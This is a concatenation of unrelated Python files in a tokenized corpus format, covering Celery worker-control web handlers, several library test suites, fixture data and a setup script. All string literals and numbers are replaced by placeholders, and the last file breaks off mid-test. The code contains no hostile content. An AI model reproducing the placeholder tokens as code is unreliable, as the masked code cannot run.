<s> from __future__ import absolute_import <EOL> import time <EOL> import logging <EOL> import collections <EOL> from tornado import web <EOL> from tornado import gen <EOL> from . . views import BaseHandler <EOL> logger = logging . getLogger ( __name__ ) <EOL> class ControlHandler ( BaseHandler ) : <EOL> INSPECT_METHODS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> worker_cache = collections . defaultdict ( dict ) <EOL> @ gen . coroutine <EOL> def update_cache ( self , workername = None ) : <EOL> yield self . update_workers ( workername = workername , <EOL> app = self . application ) <EOL> @ classmethod <EOL> @ gen . coroutine <EOL> def update_workers ( cls , app , workername = None ) : <EOL> logger . debug ( "<STR_LIT>" , workername or '<STR_LIT:all>' ) <EOL> futures = [ ] <EOL> destination = [ workername ] if workername else None <EOL> timeout = app . options . inspect_timeout / <NUM_LIT> <EOL> inspect = app . capp . control . inspect ( <EOL> timeout = timeout , destination = destination ) <EOL> for method in cls . INSPECT_METHODS : <EOL> futures . append ( app . delay ( getattr ( inspect , method ) ) ) <EOL> results = yield futures <EOL> for i , result in enumerate ( results ) : <EOL> if result is None : <EOL> logger . warning ( "<STR_LIT>" , <EOL> cls . INSPECT_METHODS [ i ] ) <EOL> continue <EOL> for worker , response in result . items ( ) : <EOL> if response is not None : <EOL> info = cls . worker_cache [ worker ] <EOL> info [ cls . INSPECT_METHODS [ i ] ] = response <EOL> info [ '<STR_LIT>' ] = time . time ( ) <EOL> def is_worker ( self , workername ) : <EOL> return workername and workername in self . worker_cache <EOL> def error_reason ( self , workername , response ) : <EOL> "<STR_LIT>" <EOL> for r in response : <EOL> try : <EOL> return r [ workername ] . get ( '<STR_LIT:error>' , '<STR_LIT>' ) <EOL> except KeyError : <EOL> pass <EOL> logger . 
error ( "<STR_LIT>" , response ) <EOL> return '<STR_LIT>' <EOL> @ classmethod <EOL> def get_active_queue_names ( cls ) : <EOL> queues = set ( [ ] ) <EOL> for worker , info in cls . worker_cache . items ( ) : <EOL> for q in info . get ( '<STR_LIT>' , [ ] ) : <EOL> queues . add ( q [ '<STR_LIT:name>' ] ) <EOL> return queues <EOL> class WorkerShutDown ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> logger . info ( "<STR_LIT>" , workername ) <EOL> self . capp . control . broadcast ( '<STR_LIT>' , destination = [ workername ] ) <EOL> self . write ( dict ( message = "<STR_LIT>" ) ) <EOL> class WorkerPoolRestart ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> logger . info ( "<STR_LIT>" , workername ) <EOL> response = self . capp . control . broadcast ( <EOL> '<STR_LIT>' , arguments = { '<STR_LIT>' : False } , <EOL> destination = [ workername ] , reply = True ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( <EOL> message = "<STR_LIT>" % workername ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % ( <EOL> workername , self . error_reason ( workername , response ) <EOL> ) ) <EOL> class WorkerPoolGrow ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> n = self . get_argument ( '<STR_LIT:n>' , default = <NUM_LIT:1> , type = int ) <EOL> logger . info ( "<STR_LIT>" , workername , n ) <EOL> response = self . 
capp . control . pool_grow ( <EOL> n = n , reply = True , destination = [ workername ] ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( <EOL> message = "<STR_LIT>" % ( workername , n ) ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % ( <EOL> workername , self . error_reason ( workername , response ) ) ) <EOL> class WorkerPoolShrink ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> n = self . get_argument ( '<STR_LIT:n>' , default = <NUM_LIT:1> , type = int ) <EOL> logger . info ( "<STR_LIT>" , workername , n ) <EOL> response = self . capp . control . pool_shrink ( <EOL> n = n , reply = True , destination = [ workername ] ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = "<STR_LIT>" % ( <EOL> workername , n ) ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % ( <EOL> workername , self . error_reason ( workername , response ) <EOL> ) ) <EOL> class WorkerPoolAutoscale ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> min = self . get_argument ( '<STR_LIT>' , type = int ) <EOL> max = self . get_argument ( '<STR_LIT>' , type = int ) <EOL> logger . info ( "<STR_LIT>" , <EOL> workername , ( min , max ) ) <EOL> response = self . capp . control . 
broadcast ( <EOL> '<STR_LIT>' , arguments = { '<STR_LIT>' : min , '<STR_LIT>' : max } , <EOL> destination = [ workername ] , reply = True ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = "<STR_LIT>" <EOL> "<STR_LIT>" % ( <EOL> workername , min , max ) ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % ( <EOL> workername , self . error_reason ( workername , response ) <EOL> ) ) <EOL> class WorkerQueueAddConsumer ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> queue = self . get_argument ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" , <EOL> queue , workername ) <EOL> response = self . capp . control . broadcast ( <EOL> '<STR_LIT>' , arguments = { '<STR_LIT>' : queue } , <EOL> destination = [ workername ] , reply = True ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = response [ <NUM_LIT:0> ] [ workername ] [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % ( <EOL> queue , workername , self . error_reason ( workername , response ) <EOL> ) ) <EOL> class WorkerQueueCancelConsumer ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> queue = self . get_argument ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" , <EOL> queue , workername ) <EOL> response = self . capp . control . 
broadcast ( <EOL> '<STR_LIT>' , arguments = { '<STR_LIT>' : queue } , <EOL> destination = [ workername ] , reply = True ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = response [ <NUM_LIT:0> ] [ workername ] [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( <EOL> "<STR_LIT>" % ( <EOL> queue , workername , self . error_reason ( workername , response ) <EOL> ) ) <EOL> class TaskRevoke ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , taskid ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" , taskid ) <EOL> terminate = self . get_argument ( '<STR_LIT>' , default = False , type = bool ) <EOL> self . capp . control . revoke ( taskid , terminate = terminate ) <EOL> self . write ( dict ( message = "<STR_LIT>" % taskid ) ) <EOL> class TaskTimout ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , taskname ) : <EOL> """<STR_LIT>""" <EOL> workername = self . get_argument ( '<STR_LIT>' ) <EOL> hard = self . get_argument ( '<STR_LIT>' , default = None , type = float ) <EOL> soft = self . get_argument ( '<STR_LIT>' , default = None , type = float ) <EOL> if taskname not in self . capp . tasks : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % taskname ) <EOL> if workername is not None and not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> logger . info ( "<STR_LIT>" , <EOL> taskname , soft , hard ) <EOL> destination = [ workername ] if workername is not None else None <EOL> response = self . capp . control . time_limit ( <EOL> taskname , reply = True , hard = hard , soft = soft , <EOL> destination = destination ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . 
write ( dict ( message = response [ <NUM_LIT:0> ] [ workername ] [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % <EOL> self . error_reason ( taskname , response ) ) <EOL> class TaskRateLimit ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , taskname ) : <EOL> """<STR_LIT>""" <EOL> workername = self . get_argument ( '<STR_LIT>' ) <EOL> ratelimit = self . get_argument ( '<STR_LIT>' ) <EOL> if taskname not in self . capp . tasks : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % taskname ) <EOL> if workername is not None and not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> logger . info ( "<STR_LIT>" , <EOL> ratelimit , taskname ) <EOL> destination = [ workername ] if workername is not None else None <EOL> response = self . capp . control . rate_limit ( <EOL> taskname , ratelimit , reply = True , destination = destination ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = response [ <NUM_LIT:0> ] [ workername ] [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % <EOL> self . error_reason ( taskname , response ) ) </s>
<s> import unittest <EOL> import tornado . testing <EOL> from glob import glob <EOL> def all ( ) : <EOL> test_modules = list ( map ( lambda x : x . rstrip ( '<STR_LIT>' ) . replace ( '<STR_LIT:/>' , '<STR_LIT:.>' ) , <EOL> glob ( '<STR_LIT>' ) + glob ( '<STR_LIT>' ) ) ) <EOL> return unittest . defaultTestLoader . loadTestsFromNames ( test_modules ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> tornado . testing . main ( ) </s>
<s> class route ( object ) : <EOL> """<STR_LIT>""" <EOL> _routes = [ ] <EOL> def __init__ ( self , regexp ) : <EOL> self . _regexp = regexp <EOL> def __call__ ( self , handler ) : <EOL> """<STR_LIT>""" <EOL> self . _routes . append ( ( self . _regexp , handler ) ) <EOL> return handler <EOL> @ classmethod <EOL> def get_routes ( cls ) : <EOL> return cls . _routes </s>
<s> """<STR_LIT>""" <EOL> api_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> service_discovery = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" <EOL> ] <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:application/json>" <EOL> ] <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:application/json>" <EOL> ] <EOL> } <EOL> ] <EOL> } <EOL> service_types = [ <EOL> { <EOL> "<STR_LIT>" : <NUM_LIT> <NUM_LIT:1> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT>" : <NUM_LIT> <NUM_LIT:2> , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT>" : <NUM_LIT> <NUM_LIT:3> , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> 
"<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" <EOL> } <EOL> ] <EOL> service_definitions = { <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:code>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:key>" : <NUM_LIT> , <EOL> "<STR_LIT:name>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT:key>" : <NUM_LIT> , <EOL> "<STR_LIT:name>" : "<STR_LIT>" <EOL> } <EOL> ] <EOL> } <EOL> ] <EOL> } <EOL> } <EOL> srs = [ <EOL> { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> <NUM_LIT:6> , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : - <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> <NUM_LIT:6> , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : - <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> import pytest <EOL> from rtv . page import Page , PageController , logged_in <EOL> try : <EOL> from unittest import mock <EOL> except ImportError : <EOL> import mock <EOL> def test_page_logged_in ( terminal ) : <EOL> page = mock . MagicMock ( ) <EOL> page . term = terminal <EOL> @ logged_in <EOL> def func ( _ ) : <EOL> raise RuntimeError ( ) <EOL> page . reddit . is_oauth_session . return_value = True <EOL> with pytest . raises ( RuntimeError ) : <EOL> func ( page ) <EOL> message = '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> with pytest . raises ( AssertionError ) : <EOL> terminal . stdscr . subwin . addstr . assert_called_with ( <NUM_LIT:1> , <NUM_LIT:1> , message ) <EOL> page . reddit . is_oauth_session . return_value = False <EOL> func ( page ) <EOL> message = '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> terminal . stdscr . subwin . addstr . assert_called_with ( <NUM_LIT:1> , <NUM_LIT:1> , message ) <EOL> def test_page_unauthenticated ( reddit , terminal , config , oauth ) : <EOL> page = Page ( reddit , terminal , config , oauth ) <EOL> page . controller = PageController ( page , keymap = config . keymap ) <EOL> with mock . patch . object ( page , '<STR_LIT>' ) , mock . patch . object ( page , '<STR_LIT:content>' ) , mock . patch . object ( page , '<STR_LIT>' ) , mock . patch . object ( page , '<STR_LIT>' ) : <EOL> def func ( _ ) : <EOL> page . active = False <EOL> with mock . patch . object ( page , '<STR_LIT>' ) : <EOL> page . controller . trigger = mock . MagicMock ( side_effect = func ) <EOL> page . loop ( ) <EOL> assert page . draw . called <EOL> terminal . stdscr . getch . return_value = ord ( '<STR_LIT:y>' ) <EOL> with mock . patch ( '<STR_LIT>' ) as sys_exit : <EOL> page . controller . trigger ( '<STR_LIT:q>' ) <EOL> assert sys_exit . called <EOL> terminal . stdscr . getch . return_value = terminal . ESCAPE <EOL> with mock . patch ( '<STR_LIT>' ) as sys_exit : <EOL> page . controller . 
trigger ( '<STR_LIT:q>' ) <EOL> assert not sys_exit . called <EOL> terminal . stdscr . getch . return_value = terminal . ESCAPE <EOL> with mock . patch ( '<STR_LIT>' ) as sys_exit : <EOL> page . controller . trigger ( '<STR_LIT>' ) <EOL> assert sys_exit . called <EOL> page . controller . trigger ( '<STR_LIT:?>' ) <EOL> message = '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> terminal . stdscr . subwin . addstr . assert_any_call ( <NUM_LIT:1> , <NUM_LIT:1> , message ) <EOL> page . controller . trigger ( '<STR_LIT:1>' ) <EOL> page . refresh_content . assert_called_with ( order = '<STR_LIT>' ) <EOL> page . controller . trigger ( '<STR_LIT:2>' ) <EOL> page . refresh_content . assert_called_with ( order = '<STR_LIT>' ) <EOL> page . controller . trigger ( '<STR_LIT:3>' ) <EOL> page . refresh_content . assert_called_with ( order = '<STR_LIT>' ) <EOL> page . controller . trigger ( '<STR_LIT:4>' ) <EOL> page . refresh_content . assert_called_with ( order = '<STR_LIT>' ) <EOL> page . controller . trigger ( '<STR_LIT:5>' ) <EOL> page . refresh_content . assert_called_with ( order = '<STR_LIT>' ) <EOL> logged_in_methods = [ <EOL> '<STR_LIT:a>' , <EOL> '<STR_LIT:z>' , <EOL> '<STR_LIT:d>' , <EOL> '<STR_LIT:e>' , <EOL> '<STR_LIT:i>' , <EOL> ] <EOL> for ch in logged_in_methods : <EOL> page . controller . trigger ( ch ) <EOL> message = '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> terminal . stdscr . subwin . addstr . assert_called_with ( <NUM_LIT:1> , <NUM_LIT:1> , message ) <EOL> terminal . stdscr . subwin . addstr . reset_mock ( ) <EOL> def test_page_authenticated ( reddit , terminal , config , oauth , refresh_token ) : <EOL> page = Page ( reddit , terminal , config , oauth ) <EOL> page . controller = PageController ( page , keymap = config . keymap ) <EOL> config . refresh_token = refresh_token <EOL> page . controller . trigger ( '<STR_LIT:u>' ) <EOL> assert reddit . is_oauth_session ( ) <EOL> page . controller . trigger ( '<STR_LIT:i>' ) <EOL> reddit . get_unread = mock . 
Mock ( return_value = [ ] ) <EOL> page . controller . trigger ( '<STR_LIT:i>' ) <EOL> message = '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> terminal . stdscr . subwin . addstr . assert_called_with ( <NUM_LIT:1> , <NUM_LIT:1> , message ) <EOL> terminal . stdscr . getch . return_value = ord ( '<STR_LIT:y>' ) <EOL> page . controller . trigger ( '<STR_LIT:u>' ) <EOL> assert not reddit . is_oauth_session ( ) </s>
<s> from __future__ import absolute_import , division , with_statement <EOL> from fudge import patch <EOL> from revolver import git <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_revparse ( local ) : <EOL> cmd = "<STR_LIT>" <EOL> local . expects_call ( ) . with_args ( cmd , capture = True ) . returns ( "<STR_LIT:bar>" ) <EOL> assert git . revparse ( "<STR_LIT:foo>" ) == "<STR_LIT:bar>" <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_repository_name ( local ) : <EOL> cmd = "<STR_LIT>" <EOL> local . expects_call ( ) . with_args ( cmd , capture = True ) . returns ( "<STR_LIT:bar>" ) <EOL> assert git . repository_name ( ) == "<STR_LIT:bar>" <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_repository_name_without_trailing_git ( local ) : <EOL> local . expects_call ( ) . returns ( "<STR_LIT>" ) <EOL> assert git . repository_name ( ) == "<STR_LIT:bar>" <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_repository_name_without_leading_directories ( local ) : <EOL> local . expects_call ( ) . returns ( "<STR_LIT>" ) <EOL> assert git . repository_name ( ) == "<STR_LIT:bar>" <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_archive ( temp_local , local ) : <EOL> temp_local . expects_call ( ) . returns ( "<STR_LIT>" ) <EOL> cmd = "<STR_LIT>" <EOL> local . expects_call ( ) . with_args ( cmd ) <EOL> assert git . create_archive ( "<STR_LIT:foo>" ) </s>
<s> from __future__ import absolute_import , division , with_statement <EOL> from revolver import command , package <EOL> from revolver . core import run <EOL> def install ( ) : <EOL> package . ensure ( "<STR_LIT>" ) <EOL> if not command . exists ( "<STR_LIT>" ) : <EOL> url = "<STR_LIT>" + "<STR_LIT>" <EOL> run ( "<STR_LIT>" % url ) <EOL> else : <EOL> run ( "<STR_LIT>" ) <EOL> def ensure ( ) : <EOL> if not command . exists ( "<STR_LIT>" ) : <EOL> install ( ) </s>
<s> from django . conf import settings <EOL> from balancer . routers import RandomRouter <EOL> from . import BalancerTestCase <EOL> class RandomRouterTestCase ( BalancerTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( RandomRouterTestCase , self ) . setUp ( ) <EOL> self . router = RandomRouter ( ) <EOL> def test_random_db_selection ( self ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> self . assertTrue ( self . router . get_random_db ( ) in <EOL> settings . DATABASE_POOL . keys ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_relations ( self ) : <EOL> """<STR_LIT>""" <EOL> self . obj1 . _state . db = '<STR_LIT:default>' <EOL> self . obj2 . _state . db = '<STR_LIT>' <EOL> self . assertTrue ( self . router . allow_relation ( self . obj1 , self . obj2 ) ) <EOL> self . obj1 . _state . db = '<STR_LIT>' <EOL> self . obj2 . _state . db = '<STR_LIT>' <EOL> self . assertFalse ( self . router . allow_relation ( self . obj1 , self . obj2 ) ) </s>
<s> from . compat import basestring , numeric_types <EOL> def _split_params_and_files ( params_ ) : <EOL> params = { } <EOL> files = { } <EOL> for k , v in params_ . items ( ) : <EOL> if hasattr ( v , '<STR_LIT>' ) and callable ( v . read ) : <EOL> files [ k ] = v <EOL> elif isinstance ( v , basestring ) or isinstance ( v , numeric_types ) : <EOL> params [ k ] = v <EOL> elif isinstance ( v , bool ) : <EOL> params [ k ] = '<STR_LIT:true>' if v else '<STR_LIT:false>' <EOL> return params , files </s>
<s> from click . testing import CliRunner <EOL> from changes import changelog , cli <EOL> from . import context , setup , teardown <EOL> def test_write_new_changelog ( ) : <EOL> content = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> with open ( context . tmp_file , '<STR_LIT:w>' ) as existing_file : <EOL> existing_file . writelines ( content ) <EOL> changelog . write_new_changelog ( '<STR_LIT>' , context . tmp_file , '<STR_LIT>' ) <EOL> assert '<STR_LIT>' . join ( content ) == '<STR_LIT>' . join ( open ( context . tmp_file ) . readlines ( ) ) <EOL> with open ( context . tmp_file , '<STR_LIT:w>' ) as existing_file : <EOL> existing_file . writelines ( content ) <EOL> changelog . write_new_changelog ( <EOL> '<STR_LIT>' , <EOL> context . tmp_file , <EOL> '<STR_LIT>' , <EOL> dry_run = False <EOL> ) <EOL> expected_content = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> assert '<STR_LIT>' . join ( expected_content ) == '<STR_LIT>' . join ( open ( context . tmp_file ) . readlines ( ) ) <EOL> def test_replace_sha_with_commit_link ( ) : <EOL> repo_url = '<STR_LIT>' <EOL> log = '<STR_LIT>' <EOL> expected_content = [ <EOL> '<STR_LIT>' <EOL> ] <EOL> assert expected_content == changelog . replace_sha_with_commit_link ( repo_url , log ) <EOL> def test_generate_changelog ( ) : <EOL> changelog . generate_changelog ( context ) <EOL> assert isinstance ( context . changelog_content , list ) </s>
<s> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> scripts = [ ] , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> import unittest <EOL> from hashlib import md5 as basic_md5 <EOL> from flask import Flask <EOL> from flask_httpauth import HTTPDigestAuth <EOL> from werkzeug . http import parse_dict_header <EOL> def md5 ( str ) : <EOL> if type ( str ) . __name__ == '<STR_LIT:str>' : <EOL> str = str . encode ( '<STR_LIT:utf-8>' ) <EOL> return basic_md5 ( str ) <EOL> def get_ha1 ( user , pw , realm ) : <EOL> a1 = user + "<STR_LIT::>" + realm + "<STR_LIT::>" + pw <EOL> return md5 ( a1 ) . hexdigest ( ) <EOL> class HTTPAuthTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> app = Flask ( __name__ ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> digest_auth_ha1_pw = HTTPDigestAuth ( use_ha1_pw = True ) <EOL> @ digest_auth_ha1_pw . get_password <EOL> def get_digest_password ( username ) : <EOL> if username == '<STR_LIT>' : <EOL> return get_ha1 ( username , '<STR_LIT:hello>' , digest_auth_ha1_pw . realm ) <EOL> elif username == '<STR_LIT>' : <EOL> return get_ha1 ( username , '<STR_LIT>' , digest_auth_ha1_pw . realm ) <EOL> else : <EOL> return None <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return '<STR_LIT:index>' <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ digest_auth_ha1_pw . login_required <EOL> def digest_auth_ha1_pw_route ( ) : <EOL> return '<STR_LIT>' + digest_auth_ha1_pw . username ( ) <EOL> self . app = app <EOL> self . client = app . test_client ( ) <EOL> def test_digest_ha1_pw_auth_login_valid ( self ) : <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertTrue ( response . status_code == <NUM_LIT> ) <EOL> header = response . headers . get ( '<STR_LIT>' ) 